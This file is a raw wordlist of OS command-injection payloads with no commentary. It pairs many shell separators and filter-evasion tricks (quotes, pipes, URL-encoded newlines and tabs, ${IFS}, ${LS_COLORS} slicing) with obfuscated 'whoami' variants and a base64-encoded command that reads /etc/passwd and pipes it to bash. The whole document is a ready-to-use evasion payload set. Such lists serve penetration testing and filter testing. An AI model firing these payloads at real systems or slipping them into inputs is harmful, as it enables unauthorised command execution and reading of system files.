'whoami
,whoami
;whoami
--whoami
/*whoami
*/whoami
*whoami
( )whoami
&whoami
&&whoami
|whoami
||whoami
${LS_COLORS:10:1}whoami
'w'h'o'am'i
,w'h'o'am'i
;w'h'o'am'i
--w'h'o'am'i
/*w'h'o'am'i
*/w'h'o'am'i
*w'h'o'am'i
( )w'h'o'am'i
&w'h'o'am'i
&&w'h'o'am'i
|w'h'o'am'i
||w'h'o'am'i
${LS_COLORS:10:1}w'h'o'am'i
'w"h"o"am"i
,w"h"o"am"i
;w"h"o"am"i
--w"h"o"am"i
/*w"h"o"am"i
*/w"h"o"am"i
*w"h"o"am"i
( )w"h"o"am"i
&w"h"o"am"i
&&w"h"o"am"i
|w"h"o"am"i
||w"h"o"am"i
${LS_COLORS:10:1}w"h"o"am"i
'who$@ami
,who$@ami
;who$@ami
--who$@ami
/*who$@ami
*/who$@ami
*who$@ami
( )who$@ami
&who$@ami
&&who$@ami
|who$@ami
||who$@ami
${LS_COLORS:10:1}who$@ami
'w\ho\am\i
,w\ho\am\i
;w\ho\am\i
--w\ho\am\i
/*w\ho\am\i
*/w\ho\am\i
*w\ho\am\i
( )w\ho\am\i
&w\ho\am\i
&&w\ho\am\i
|w\ho\am\i
||w\ho\am\i
${LS_COLORS:10:1}w\ho\am\i
'$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
,$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
;$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
--$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
/*$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
*/$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
*$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
( )$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
&$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
&&$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
|$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
||$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
${LS_COLORS:10:1}$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
'$(rev<<<'imaohw')
,$(rev<<<'imaohw')
;$(rev<<<'imaohw')
--$(rev<<<'imaohw')
/*$(rev<<<'imaohw')
*/$(rev<<<'imaohw')
*$(rev<<<'imaohw')
( )$(rev<<<'imaohw')
&$(rev<<<'imaohw')
&&$(rev<<<'imaohw')
|$(rev<<<'imaohw')
||$(rev<<<'imaohw')
${LS_COLORS:10:1}$(rev<<<'imaohw')
'bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
,bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
;bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
--bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
/*bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
*/bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
*bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
( )bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
&bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
&&bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
|bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
||bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
${LS_COLORS:10:1}bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
(%0a)whoami
(%0a)w'h'o'am'i
(%0a)w"h"o"am"i
(%0a)who$@ami
(%0a)w\ho\am\i
'$(tr%0a"[A-Z]"%0a"[a-z]"<<<"WhOaMi")
,$(tr%0a"[A-Z]"%0a"[a-z]"<<<"WhOaMi")
;$(tr%0a"[A-Z]"%0a"[a-z]"<<<"WhOaMi")
--$(tr%0a"[A-Z]"%0a"[a-z]"<<<"WhOaMi")
/*$(tr%0a"[A-Z]"%0a"[a-z]"<<<"WhOaMi")
*/$(tr%0a"[A-Z]"%0a"[a-z]"<<<"WhOaMi")
*$(tr%0a"[A-Z]"%0a"[a-z]"<<<"WhOaMi")
(%0a)$(tr%0a"[A-Z]"%0a"[a-z]"<<<"WhOaMi")
&$(tr%0a"[A-Z]"%0a"[a-z]"<<<"WhOaMi")
&&$(tr%0a"[A-Z]"%0a"[a-z]"<<<"WhOaMi")
|$(tr%0a"[A-Z]"%0a"[a-z]"<<<"WhOaMi")
||$(tr%0a"[A-Z]"%0a"[a-z]"<<<"WhOaMi")
${LS_COLORS:10:1}$(tr%0a"[A-Z]"%0a"[a-z]"<<<"WhOaMi")
(%0a)$(rev<<<'imaohw')
'bash<<<$(base64%0a-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
,bash<<<$(base64%0a-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
;bash<<<$(base64%0a-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
--bash<<<$(base64%0a-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
/*bash<<<$(base64%0a-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
*/bash<<<$(base64%0a-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
*bash<<<$(base64%0a-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
(%0a)bash<<<$(base64%0a-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
&bash<<<$(base64%0a-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
&&bash<<<$(base64%0a-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
|bash<<<$(base64%0a-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
||bash<<<$(base64%0a-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
${LS_COLORS:10:1}bash<<<$(base64%0a-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
(%09)whoami
(%09)w'h'o'am'i
(%09)w"h"o"am"i
(%09)who$@ami
(%09)w\ho\am\i
'$(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
,$(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
;$(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
--$(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
/*$(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
*/$(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
*$(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
(%09)$(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
&$(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
&&$(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
|$(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
||$(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
${LS_COLORS:10:1}$(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
(%09)$(rev<<<'imaohw')
'bash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
,bash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
;bash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
--bash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
/*bash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
*/bash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
*bash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
(%09)bash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
&bash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
&&bash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
|bash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
||bash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
${LS_COLORS:10:1}bash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
(${IFS})whoami
(${IFS})w'h'o'am'i
(${IFS})w"h"o"am"i
(${IFS})who$@ami
(${IFS})w\ho\am\i
'$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi")
,$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi")
;$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi")
--$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi")
/*$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi")
*/$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi")
*$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi")
(${IFS})$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi")
&$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi")
&&$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi")
|$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi")
||$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi")
${LS_COLORS:10:1}$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi")
(${IFS})$(rev<<<'imaohw')
'bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
,bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
;bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
--bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
/*bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
*/bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
*bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
(${IFS})bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
&bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
&&bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
|bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
||bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
${LS_COLORS:10:1}bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
(%0a${IFS})whoami
(%0a${IFS})w'h'o'am'i
(%0a${IFS})w"h"o"am"i
(%0a${IFS})who$@ami
(%0a${IFS})w\ho\am\i
'$(tr%0a${IFS}"[A-Z]"%0a${IFS}"[a-z]"<<<"WhOaMi")
,$(tr%0a${IFS}"[A-Z]"%0a${IFS}"[a-z]"<<<"WhOaMi")
;$(tr%0a${IFS}"[A-Z]"%0a${IFS}"[a-z]"<<<"WhOaMi")
--$(tr%0a${IFS}"[A-Z]"%0a${IFS}"[a-z]"<<<"WhOaMi")
/*$(tr%0a${IFS}"[A-Z]"%0a${IFS}"[a-z]"<<<"WhOaMi")
*/$(tr%0a${IFS}"[A-Z]"%0a${IFS}"[a-z]"<<<"WhOaMi")
*$(tr%0a${IFS}"[A-Z]"%0a${IFS}"[a-z]"<<<"WhOaMi")
(%0a${IFS})$(tr%0a${IFS}"[A-Z]"%0a${IFS}"[a-z]"<<<"WhOaMi")
&$(tr%0a${IFS}"[A-Z]"%0a${IFS}"[a-z]"<<<"WhOaMi")
&&$(tr%0a${IFS}"[A-Z]"%0a${IFS}"[a-z]"<<<"WhOaMi")
|$(tr%0a${IFS}"[A-Z]"%0a${IFS}"[a-z]"<<<"WhOaMi")
||$(tr%0a${IFS}"[A-Z]"%0a${IFS}"[a-z]"<<<"WhOaMi")
${LS_COLORS:10:1}$(tr%0a${IFS}"[A-Z]"%0a${IFS}"[a-z]"<<<"WhOaMi")
(%0a${IFS})$(rev<<<'imaohw')
'bash<<<$(base64%0a${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
,bash<<<$(base64%0a${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
;bash<<<$(base64%0a${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
--bash<<<$(base64%0a${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
/*bash<<<$(base64%0a${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
*/bash<<<$(base64%0a${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
*bash<<<$(base64%0a${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
(%0a${IFS})bash<<<$(base64%0a${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
&bash<<<$(base64%0a${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
&&bash<<<$(base64%0a${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
|bash<<<$(base64%0a${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
||bash<<<$(base64%0a${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
${LS_COLORS:10:1}bash<<<$(base64%0a${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
